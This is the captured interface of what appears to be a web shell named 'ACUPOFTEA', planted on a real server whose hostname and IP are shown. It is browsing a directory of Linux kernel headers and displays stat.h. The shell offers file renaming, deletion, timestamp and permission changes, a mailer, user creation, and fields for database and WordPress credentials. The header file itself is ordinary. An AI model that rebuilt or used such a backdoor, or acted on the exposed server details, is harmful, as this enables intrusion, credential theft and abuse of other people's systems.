System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
include
/
asm
/
216.73.216.141
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for accounting.gulfstore-gcc.com made by tabagkayu.
Folder Name
File Name
File Content
File
stat.h
/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ #ifndef _ASM_X86_STAT_H #define _ASM_X86_STAT_H #include <asm/posix_types.h> #define STAT_HAVE_NSEC 1 #ifdef __i386__ struct stat { unsigned long st_dev; unsigned long st_ino; unsigned short st_mode; unsigned short st_nlink; unsigned short st_uid; unsigned short st_gid; unsigned long st_rdev; unsigned long st_size; unsigned long st_blksize; unsigned long st_blocks; unsigned long st_atime; unsigned long st_atime_nsec; unsigned long st_mtime; unsigned long st_mtime_nsec; unsigned long st_ctime; unsigned long st_ctime_nsec; unsigned long __unused4; unsigned long __unused5; }; /* We don't need to memset the whole thing just to initialize the padding */ #define INIT_STRUCT_STAT_PADDING(st) do { \ st.__unused4 = 0; \ st.__unused5 = 0; \ } while (0) #define STAT64_HAS_BROKEN_ST_INO 1 /* This matches struct stat64 in glibc2.1, hence the absolutely * insane amounts of padding around dev_t's. */ struct stat64 { unsigned long long st_dev; unsigned char __pad0[4]; unsigned long __st_ino; unsigned int st_mode; unsigned int st_nlink; unsigned long st_uid; unsigned long st_gid; unsigned long long st_rdev; unsigned char __pad3[4]; long long st_size; unsigned long st_blksize; /* Number 512-byte blocks allocated. */ unsigned long long st_blocks; unsigned long st_atime; unsigned long st_atime_nsec; unsigned long st_mtime; unsigned int st_mtime_nsec; unsigned long st_ctime; unsigned long st_ctime_nsec; unsigned long long st_ino; }; /* We don't need to memset the whole thing just to initialize the padding */ #define INIT_STRUCT_STAT64_PADDING(st) do { \ memset(&st.__pad0, 0, sizeof(st.__pad0)); \ memset(&st.__pad3, 0, sizeof(st.__pad3)); \ } while (0) #else /* __i386__ */ struct stat { __kernel_ulong_t st_dev; __kernel_ulong_t st_ino; __kernel_ulong_t st_nlink; unsigned int st_mode; unsigned int st_uid; unsigned int st_gid; unsigned int __pad0; __kernel_ulong_t st_rdev; __kernel_long_t st_size; __kernel_long_t st_blksize; __kernel_long_t st_blocks; /* Number 512-byte blocks allocated. */ __kernel_ulong_t st_atime; __kernel_ulong_t st_atime_nsec; __kernel_ulong_t st_mtime; __kernel_ulong_t st_mtime_nsec; __kernel_ulong_t st_ctime; __kernel_ulong_t st_ctime_nsec; __kernel_long_t __unused[3]; }; /* We don't need to memset the whole thing just to initialize the padding */ #define INIT_STRUCT_STAT_PADDING(st) do { \ st.__pad0 = 0; \ st.__unused[0] = 0; \ st.__unused[1] = 0; \ st.__unused[2] = 0; \ } while (0) #endif /* for 32bit emulation and 32 bit kernels */ struct __old_kernel_stat { unsigned short st_dev; unsigned short st_ino; unsigned short st_mode; unsigned short st_nlink; unsigned short st_uid; unsigned short st_gid; unsigned short st_rdev; #ifdef __i386__ unsigned long st_size; unsigned long st_atime; unsigned long st_mtime; unsigned long st_ctime; #else unsigned int st_size; unsigned int st_atime; unsigned int st_mtime; unsigned int st_ctime; #endif }; #endif /* _ASM_X86_STAT_H */
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
..
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
a.out.h
text/x-c
756 B
-rw-r--r--
2025-12-08 09:06:44
amd_hsmp.h
text/x-c
8.68 KB
-rw-r--r--
2025-12-08 09:06:44
auxvec.h
text/x-c
618 B
-rw-r--r--
2025-12-08 09:06:44
bitsperlong.h
text/x-c
321 B
-rw-r--r--
2025-12-08 09:06:45
boot.h
text/x-c
323 B
-rw-r--r--
2025-12-08 09:06:44
bootparam.h
text/x-c
7.58 KB
-rw-r--r--
2025-12-08 09:06:44
bpf_perf_event.h
text/x-c
40 B
-rw-r--r--
2025-12-08 09:06:45
byteorder.h
text/x-c
176 B
-rw-r--r--
2025-12-08 09:06:44
debugreg.h
text/x-c
3.25 KB
-rw-r--r--
2025-12-08 09:06:44
e820.h
text/x-c
2.52 KB
-rw-r--r--
2025-12-08 09:06:44
errno.h
text/x-c
31 B
-rw-r--r--
2025-12-08 09:06:44
fcntl.h
text/x-c
31 B
-rw-r--r--
2025-12-08 09:06:44
hw_breakpoint.h
text/plain
69 B
-rw-r--r--
2025-12-08 09:06:44
hwcap2.h
text/x-c
270 B
-rw-r--r--
2025-12-08 09:06:44
ioctl.h
text/x-c
31 B
-rw-r--r--
2025-12-08 09:06:45
ioctls.h
text/x-c
32 B
-rw-r--r--
2025-12-08 09:06:44
ipcbuf.h
text/x-c
32 B
-rw-r--r--
2025-12-08 09:06:44
ist.h
text/x-c
854 B
-rw-r--r--
2025-12-08 09:06:44
kvm.h
text/x-c
11.44 KB
-rw-r--r--
2025-12-08 09:06:44
kvm_para.h
text/x-c
4.24 KB
-rw-r--r--
2025-12-08 09:06:44
kvm_perf.h
text/x-c
388 B
-rw-r--r--
2025-12-08 09:06:44
ldt.h
text/x-c
1.28 KB
-rw-r--r--
2025-12-08 09:06:44
mce.h
text/x-c
1.65 KB
-rw-r--r--
2025-12-08 09:06:44
mman.h
text/x-c
1002 B
-rw-r--r--
2025-12-08 09:06:44
msgbuf.h
text/x-c
1.03 KB
-rw-r--r--
2025-12-08 09:06:45
msr.h
text/x-c
346 B
-rw-r--r--
2025-12-08 09:06:44
mtrr.h
text/x-c
4.13 KB
-rw-r--r--
2025-12-08 09:06:44
param.h
text/x-c
31 B
-rw-r--r--
2025-12-08 09:06:44
perf_regs.h
text/x-c
1.37 KB
-rw-r--r--
2025-12-08 09:06:44
poll.h
text/x-c
30 B
-rw-r--r--
2025-12-08 09:06:45
posix_types.h
text/x-c
224 B
-rw-r--r--
2025-12-08 09:06:44
posix_types_32.h
text/x-c
765 B
-rw-r--r--
2025-12-08 09:06:44
posix_types_64.h
text/x-c
609 B
-rw-r--r--
2025-12-08 09:06:44
posix_types_x32.h
text/x-c
581 B
-rw-r--r--
2025-12-08 09:06:44
prctl.h
text/x-c
618 B
-rw-r--r--
2025-12-08 09:06:44
processor-flags.h
text/x-c
6.47 KB
-rw-r--r--
2025-12-08 09:06:44
ptrace-abi.h
text/x-c
1.99 KB
-rw-r--r--
2025-12-08 09:06:44
ptrace.h
text/x-c
1.46 KB
-rw-r--r--
2025-12-08 09:06:45
resource.h
text/x-c
34 B
-rw-r--r--
2025-12-08 09:06:44
sembuf.h
text/x-c
1.02 KB
-rw-r--r--
2025-12-08 09:06:44
setup.h
text/plain
6 B
-rw-r--r--
2025-12-08 09:06:45
sgx.h
text/x-c
8.15 KB
-rw-r--r--
2025-12-08 09:06:44
shmbuf.h
text/x-c
1.23 KB
-rw-r--r--
2025-12-08 09:06:44
sigcontext.h
text/x-c
9.5 KB
-rw-r--r--
2025-12-08 09:06:45
sigcontext32.h
text/x-c
247 B
-rw-r--r--
2025-12-08 09:06:44
siginfo.h
text/x-c
422 B
-rw-r--r--
2025-12-08 09:06:44
signal.h
text/x-c
2.83 KB
-rw-r--r--
2025-12-08 09:06:44
socket.h
text/x-c
32 B
-rw-r--r--
2025-12-08 09:06:45
sockios.h
text/x-c
33 B
-rw-r--r--
2025-12-08 09:06:44
stat.h
text/x-c
3.06 KB
-rw-r--r--
2025-12-08 09:06:44
statfs.h
text/x-c
416 B
-rw-r--r--
2025-12-08 09:06:44
svm.h
text/x-c
9.54 KB
-rw-r--r--
2025-12-08 09:06:44
swab.h
text/x-c
724 B
-rw-r--r--
2025-12-08 09:06:44
termbits.h
text/x-c
34 B
-rw-r--r--
2025-12-08 09:06:44
termios.h
text/x-c
33 B
-rw-r--r--
2025-12-08 09:06:44
types.h
text/x-c
152 B
-rw-r--r--
2025-12-08 09:06:45
ucontext.h
text/x-c
2.07 KB
-rw-r--r--
2025-12-08 09:06:44
unistd.h
text/x-c
359 B
-rw-r--r--
2025-12-08 09:06:44
unistd_32.h
text/x-c
10.87 KB
-rw-r--r--
2025-12-08 09:06:45
unistd_64.h
text/x-c
9.1 KB
-rw-r--r--
2025-12-08 09:06:45
unistd_x32.h
text/x-c
16.03 KB
-rw-r--r--
2025-12-08 09:06:45
vm86.h
text/x-c
3.04 KB
-rw-r--r--
2025-12-08 09:06:44
vmx.h
text/x-c
7.2 KB
-rw-r--r--
2025-12-08 09:06:44
vsyscall.h
text/x-c
263 B
-rw-r--r--
2025-12-08 09:06:44
~ ACUPOFTEA - accounting.gulfstore-gcc.com